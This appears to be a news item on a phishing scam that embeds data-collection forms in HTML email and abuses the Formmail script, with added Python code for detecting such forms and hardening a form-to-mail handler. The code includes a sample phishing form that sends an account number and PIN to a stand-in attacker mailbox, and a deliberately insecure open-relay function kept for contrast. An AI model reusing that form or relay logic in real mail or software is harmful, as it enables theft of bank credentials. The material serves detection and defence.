Phishing typically collects data through a web site that imitates a bank or online retailer. By embedding the data-collection form directly in an HTML email, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent web site. The HTML form within the email lets phishers set the destination email address themselves, allowing submissions to be easily re-routed as collection mailboxes are shut down.
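The attack described above leaves a recognisable footprint in the message itself: a `<form>` in the HTML body that posts to a third-party host, often a form-to-mail script, and carries a hidden field naming the mailbox that should receive the data. The following scanner, an added example rather than code from the original article or from Netcraft, extracts forms from an HTML email body and reports why each one looks like a mail-borne data collector. The sample message body, the `bank.example` sender domain, the `ROUTING_FIELDS` names (taken from the classic FormMail interface) and the `SCRIPT_HINTS` path fragments are all constructed assumptions for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of the kind of HTML body the article describes:
# a form inside the message, posting to a form-to-mail script on a
# third-party host, with the destination mailbox chosen by the sender.
SAMPLE_HTML_BODY = """
<html><body>
<p>Please confirm your account details.</p>
<form method="post" action="http://hosting.example/cgi-bin/formmail.pl">
  <input type="hidden" name="recipient" value="collector@attacker.example">
  <input type="text" name="account_number">
  <input type="password" name="pin">
  <input type="submit" value="Confirm">
</form>
</body></html>
"""

# Field names a FormMail-style script reads to decide where to mail the data
# (assumption: the classic FormMail interface; extend for scripts you see).
ROUTING_FIELDS = {"recipient", "recipients"}
# Substrings in field names that suggest credential or payment data is collected.
SENSITIVE_FIELDS = {"password", "pin", "ssn", "card", "cvv", "account"}
# Path fragments typical of form-to-mail scripts (assumption, not an exhaustive list).
SCRIPT_HINTS = ("formmail", "mailform")


class _FormCollector(HTMLParser):
    """Collect every <form> with its <input> elements from an HTML body."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": (a.get("name") or "").lower(),
                "value": a.get("value") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(html_body):
    parser = _FormCollector()
    parser.feed(html_body)
    return parser.forms


def assess_form(form, sender_domain):
    """Return the reasons this form looks like an in-mail data collector."""
    reasons = []
    parsed = urlparse(form["action"])
    host = parsed.hostname or ""
    path = parsed.path.lower()
    # A form in mail from bank.example that posts anywhere else is suspicious.
    if host and not host.endswith(sender_domain):
        reasons.append(f"form posts to third-party host {host}")
    if any(hint in path for hint in SCRIPT_HINTS):
        reasons.append(f"action targets a form-to-mail script ({path})")
    for inp in form["inputs"]:
        if inp["type"] == "hidden" and inp["name"] in ROUTING_FIELDS:
            reasons.append(f"hidden {inp['name']} field routes submissions to {inp['value']}")
        if inp["type"] == "password" or any(s in inp["name"] for s in SENSITIVE_FIELDS):
            reasons.append(f"collects sensitive field '{inp['name']}'")
    return reasons


def scan_email_html(html_body, sender_domain):
    """Return one finding per suspicious form; an empty list means nothing flagged."""
    findings = []
    for form in extract_forms(html_body):
        reasons = assess_form(form, sender_domain)
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_email_html(SAMPLE_HTML_BODY, "bank.example"):
        print(finding["action"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

A mail gateway would run `scan_email_html` over the decoded `text/html` part of each message and quarantine or tag anything with findings; the off-domain action alone is a strong signal, because a legitimate bank mailing has no reason to post customer data to someone else's hosting account.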
The scam takes advantage of a known weakness in Formmail, a widely used form-to-mail Perl script initially written in 1995. In early 2001, spammers began using Formmail to anonymously deliver massive volumes of spam, taking advantage of Formmail's failure to restrict who could use the script and where it would send mail. Most hosting providers have since replaced the original Formmail with customized versions or secure replacement scripts such as the NMS Project's. The Brazilian hosting reseller involved in this incident, Hospedagem Empresarial (www.he.com.br), is an exception.
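The weakness that both the 2001 spam abuse and this phishing variant rely on is the same: the script mails the submission to whatever address the form's own `recipient` field names, so anyone who can reach the script can turn it into a relay. The example below is added here and is not the original Formmail, the NMS replacement, or code from the article; it contrasts the open-relay behaviour with the restriction a hardened form-to-mail handler applies. The `ALLOWED_RECIPIENTS` and `ALLOWED_REFERERS` values are hypothetical operator configuration, and the field and header names follow the classic FormMail interface.

```python
from urllib.parse import urlparse

# Hypothetical operator configuration for a form-to-mail handler.
# Only these mailboxes may ever receive a submission ...
ALLOWED_RECIPIENTS = {"sales@example.org", "support@example.org"}
# ... and only forms hosted on these sites may trigger one.
ALLOWED_REFERERS = {"example.org", "www.example.org"}


def open_relay_recipient(fields):
    """Insecure behaviour: deliver to whatever the submitted form asked for.

    This is the failure the article describes: the recipient is chosen by the
    party who built the form, not by the site operator running the script.
    """
    return fields.get("recipient")


def restricted_recipient(fields, headers):
    """Hardened behaviour: deliver only to an allowlisted mailbox, and only for
    forms submitted from the operator's own site.

    Returns (recipient, reason); recipient is None when the submission is refused.
    """
    recipient = (fields.get("recipient") or "").strip().lower()
    # The decisive control: the script never mails outside the allowlist,
    # so a form in someone's email cannot redirect data to a mailbox of its choosing.
    if recipient not in ALLOWED_RECIPIENTS:
        return None, "recipient not in allowlist"
    # Secondary control: a form embedded in an email message is not served from
    # the operator's site, so its submission will not carry an allowed Referer.
    # (Referer can be forged or stripped, which is why it is not the only check.)
    referer_host = urlparse(headers.get("Referer", "")).hostname or ""
    if referer_host not in ALLOWED_REFERERS:
        return None, "form not submitted from an allowed site"
    return recipient, "ok"


if __name__ == "__main__":
    # Constructed submission of the kind the article describes: the form
    # itself names the collection mailbox and arrives with no Referer.
    phish_fields = {"recipient": "collector@attacker.example", "pin": "1234"}
    print("open relay delivers to:", open_relay_recipient(phish_fields))
    print("hardened handler:", restricted_recipient(phish_fields, {}))

    legit_fields = {"recipient": "sales@example.org", "message": "hello"}
    legit_headers = {"Referer": "https://www.example.org/contact.html"}
    print("hardened handler:", restricted_recipient(legit_fields, legit_headers))
```

A further hardening step, which the NMS replacement also takes, is to stop reading the destination from the form at all and instead map a short alias in the form to a server-side address, so that the real mailbox never appears in the HTML.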
The Netcraft Anti-Phishing Toolbar is blocking this attack, as the toolbar can block access to insecure scripts being used in phishing attacks. The toolbar is available for both Internet Explorer and Firefox.